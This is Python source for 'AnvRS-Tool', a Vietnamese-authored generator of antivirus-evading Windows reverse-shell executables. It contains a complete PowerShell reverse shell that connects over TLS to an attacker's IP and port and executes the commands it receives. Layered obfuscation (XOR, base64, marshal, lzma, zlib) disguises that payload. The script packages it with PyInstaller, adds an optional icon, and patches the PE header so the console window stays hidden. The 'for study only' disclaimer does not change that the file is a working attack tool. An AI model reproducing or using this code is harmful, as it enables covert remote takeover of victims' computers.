SourceCodeAnvRS-Tool - 18:17 28/08/2023

"""

<Coded by Hevin>


Đừng xóa đoạn này nếu bạn tôn trọng tác giả :3

Donate cho Hevin bằng cách vượt link: https://web1s.info/DonateForHevin

Cảm ơn các bạn rất nhiều ! Hãy nhớ sử dụng công cụ AnvRS với mục đích

học tập, nghiên cứu thôi nhé !

"""

import base64

import random

import re

import marshal

import zlib

import lzma

import argparse

import sys

import os

import shutil

import struct

import time

import subprocess


chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

def get_func_name_random(min, max):

  length_random = random.randint(min, max)

  random_name = [i for i in chars]

  res = ''.join(random.choice(random_name) for _ in range(length_random))

  return res


def split_base64_equally(base64_string, num_parts):

  total_length = len(base64_string)

  part_length = total_length // num_parts

  parts = [base64_string[i:i+part_length] for i in range(0, total_length, part_length)]

  return parts


def encstr(s, num_part):

  result_parts = split_base64_equally(s, num_part)


  random_variables = ''

  random_variables_saved = []

  for _, part in enumerate(result_parts):

    vari = get_func_name_random(5,10)

    random_variables += f'${vari} = "{part}"\n'

    random_variables_saved.append("$"+vari)

  plusvar = '+'.join(random_variables_saved)

  return random_variables, plusvar


def encstr_payload(s, num_part):

  result_parts = split_base64_equally(s, num_part)


  random_variables = ''

  random_variables_saved = []

  for _, part in enumerate(result_parts):

    vari = get_func_name_random(5,10)

    random_variables += f'{vari} = "{part}"\n'

    random_variables_saved.append(vari)

  plusvar = '+'.join(random_variables_saved)

  return random_variables, plusvar


def enc_data_type(s, num_part):

  result_parts = split_base64_equally(s, num_part)


  random_variables = ''

  random_variables_saved = []

  for _, part in enumerate(result_parts):

    vari = get_func_name_random(5,10)

    random_variables += f'${vari} = "{part}"\n'

    random_variables_saved.append("$"+vari)

  plusvar = ''.join(random_variables_saved)

  return random_variables, plusvar


def safe_replace(main_str, search_str, replace_str):

  escaped_search_str = re.escape(search_str)

  regex = r'\b' + escaped_search_str + r'\b'

  modified_str = re.sub(regex, replace_str, main_str)

  return modified_str


def payload2decimal(payload):

  decimal_values = [str(ord(char)) for char in payload]

  decimal_string = ','.join(decimal_values)

  return decimal_string


def enc(contents):

  string = contents

  a = 0

   

  key = ""

  while a < 100:

    key = key + str(random.randint(0, 9))

    a += 1


  payload_length = len(string)

  output_string = ""

  for i in range(payload_length):

    current_string = string[i]

    current_key = key[i % len(key)]

    output_string += chr(ord(current_string) ^ ord(current_key))

  c = repr(output_string)

  encrypt = c.replace("'", "")

  code = rf"""

var1 = "{encrypt}" 

var2 = "{key}"

var3 = len(var1)

var4 = ""

for var5 in range(var3):

  var6 = var1[var5]

  var7 = var2[var5 % len(var2)]

  var4 += chr(ord(var6) ^ ord(var7))

eval(compile(var4, '', 'exec'))

"""

  items = ['var1', 'var2', 'var3', 'var4', 'var5', 'var6', 'var7']

  for item in items:

    randomstr = get_func_name_random(6,8)

    code = code.replace(item, randomstr)

  return code


reverse_shell_powershell = r"""

replace-dns

varnetsocket

vario

varssl

function DNSLookup ($DNSRecord) {

  return (([text.encoding]::UTF8).GetString((Invoke-WebRequest (plussd + $DNSRecord) -Headers @{'accept'='application/dns-json'}).Content) | ConvertFrom-Json).Answer.data.Trim('"')

}

do {

  Start-Sleep -Seconds 1

  try{

    $TCPClient = New-Object netsocket('IP-ADDRESS', PORT)

  } catch {}

} until ($TCPClient.Connected)

$NetworkStream = $TCPClient.GetStream()

$SslStream = New-Object sslstream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]))

$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false)

if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {

  $SslStream.Close()

  exit

}

$StreamWriter = New-Object iostream($SslStream)

function WriteToStream ($String) {

  [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}

  $StreamWriter.Write($String + 'AnvRS> ')

  $StreamWriter.Flush()

}

WriteToStream ''

try {

  while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {

    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)

    $Output = try {

      Invoke-Expression $Command 2>&1 | Out-String

    } catch {

      $_ | Out-String

    }

    WriteToStream ($Output)

  }

} catch [System.IO.IOException] {

  Write-Host ""

} finally {

  $StreamWriter.Close()

  $SslStream.Close()

}

"""

banner = r"""

    ░█████╗░███╗░░██╗██╗░░░██╗██████╗░░██████╗

    ██╔══██╗████╗░██║██║░░░██║██╔══██╗██╔════╝

    ███████║██╔██╗██║╚██╗░██╔╝██████╔╝╚█████╗░

    ██╔══██║██║╚████║░╚████╔╝░██╔══██╗░╚═══██╗

    ██║░░██║██║░╚███║░░╚██╔╝░░██║░░██║██████╔╝

    ╚═╝░░╚═╝╚═╝░░╚══╝░░░╚═╝░░░╚═╝░░╚═╝╚═════╝░

      <Reverse Shell Bypass AntiVirus>

╔══════════════════════════════════════════════════════╗

║ -> Developed by @Hevin and @Anonyviet        ║

║ -> Discord: @hevin19                 ║

║ -> Donate for me: https://web1s.info/DonateForHevin 

╚══════════════════════════════════════════════════════╝                                              

"""


parser = argparse.ArgumentParser()

parser.add_argument("-i", "--ip", type=str,

          help="Your IP Adress. Example: 127.0.0.1")

parser.add_argument("-p", "--port", type=str,

          help="Your Port. Example: 1234")

parser.add_argument("--icon", type=str,

          help="Enter the path to your ico file")

parser.add_argument("-o", "--output", type=str,

          help="Output File. Default: 'AnonyvietHandsome.exe' ")


args = parser.parse_args()


if len(sys.argv) == 1:

  print(banner.center(20))

  parser.print_help(sys.stderr)

  sys.exit(0)


if args.output:

  output_file = args.output

else:

  output_file = 'AnonyvietHandsome.exe'


add_icon = ''

if args.icon:

  icon_file = args.icon

  if os.path.exists(icon_file):

    add_icon = True

    pass

  else:

    print(f'[!] "{icon_file}" file not found, please check and try again')

    sys.exit(0)

else:

  add_icon = False


ip_address = args.ip

port = args.port

os.system('cls')

print(banner.center(20))

print('')

time.sleep(2)

ip_parts = list(map(int, ip_address.split('.')))

hex_representation = f"0x{''.join(format(part, '02x') for part in ip_parts)}"


print(f"[+] Converting {ip_address} to HEX")

time.sleep(1)


vardns, dnslink = encstr('https://1.1.1.1/dns-query?name=anonyviet.com&type=', 25)

varnetsocket, netsocket = enc_data_type("Net.Sockets.TCPClient", 10)

vario, iostream = enc_data_type("IO.StreamWriter", 7)

vargetstring, getstring = enc_data_type("GetString", 4)

varssl, sslstream = enc_data_type("Net.Security.SslStream", 8)


payload = safe_replace(reverse_shell_powershell, "replace-dns", vardns)

payload = safe_replace(payload, "plussd", dnslink)

payload = safe_replace(payload, "varnetsocket", varnetsocket)

payload = safe_replace(payload, "netsocket", netsocket)

payload = safe_replace(payload, "vario", vario)

payload = safe_replace(payload, "iostream", iostream)

payload = safe_replace(payload, "varssl", varssl)

payload = safe_replace(payload, "sslstream", sslstream)

payload = safe_replace(payload, "IP-ADDRESS", hex_representation)

payload = safe_replace(payload, "PORT", port)


words = ["NetworkStream", "StreamWriter", "TCPClient", "SslStream", "DNSRecord", "BytesRead", "Command", "Output"]

for word in words:

  random_str = get_func_name_random(4,8)

  payload = safe_replace(payload, word, random_str)


decimal_representation = payload2decimal(payload)

print("[+] Obfuscating Payload...")

time.sleep(2)

stub = """IEx(-JoIN((decimal_representation)|%{[cHaR]$_}));ExIt"""

payload_decimal = stub.replace("decimal_representation", decimal_representation)


python_payload = r"""

import subprocess

import base64

import os


var1 = "YXB"

var2 = "wZG"

var3 = "F0YQ=="

var4 = "YQ=="

os.chdir(os.getenv(base64.b64decode(var1+var2+var3+var4).decode()))

base64payload


with open('update.ps1', 'w') as f:

  f.write(base64.b64decode(plusbase).decode())


result = subprocess.run(r'powershell -c "$test = Get-Content .\update.ps1; Remove-Item -Path .\update.ps1; Invoke-Expression $test" ', shell=True, text=True, capture_output=True)

"""

encpayload = base64.b64encode(payload_decimal.encode()).decode()

base64payload, plusbase = encstr_payload(encpayload, 50)

s = python_payload.replace("base64payload", base64payload)

s = s.replace("plusbase", plusbase)


enc1 = enc(s)

enc2 = enc(enc1)

enc3 = enc(enc2)

enc4 = enc(enc3)

enc5 = enc(enc4)


comp = compile(enc5, '', 'exec')

mar = marshal.dumps(comp)

lz = lzma.compress(mar)

zl = zlib.compress(lz)

b64 = base64.b64encode(zl).decode()


stub2 = f"""import marshal, zlib, lzma, base64; exec(marshal.loads(lzma.decompress(zlib.decompress(base64.b64decode('{b64}')))))"""

b = output_file.split('.')

with open(f'{b[0]}.py', 'w') as f:

  f.write(stub2)


print("[+] Compiling Payload")

if add_icon:

  subprocess.run(rf"pyinstaller --onefile -i {icon_file} {b[0]}.py", shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

else:

  subprocess.run(rf"pyinstaller --onefile {b[0]}.py", shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


os.remove(f'{b[0]}.spec')

shutil.move(f'dist/{b[0]}.exe', f'{b[0]}.exe')

shutil.rmtree('build')

os.rmdir('dist')

os.remove(f'{b[0]}.py')


exe = open(output_file, "r+b")

exe.seek(0x3c)

(PeHeaderOffset,) = struct.unpack("<H", exe.read(2))


exe.seek(PeHeaderOffset)

(PeSignature,) = struct.unpack("<I", exe.read(4))

if PeSignature != 0x4550:

  sys.exit(-1)


exe.seek(PeHeaderOffset + 0x5C)

exe.write(struct.pack("<H", 0x02))

exe.close()

print("[+] Completed Successfully !")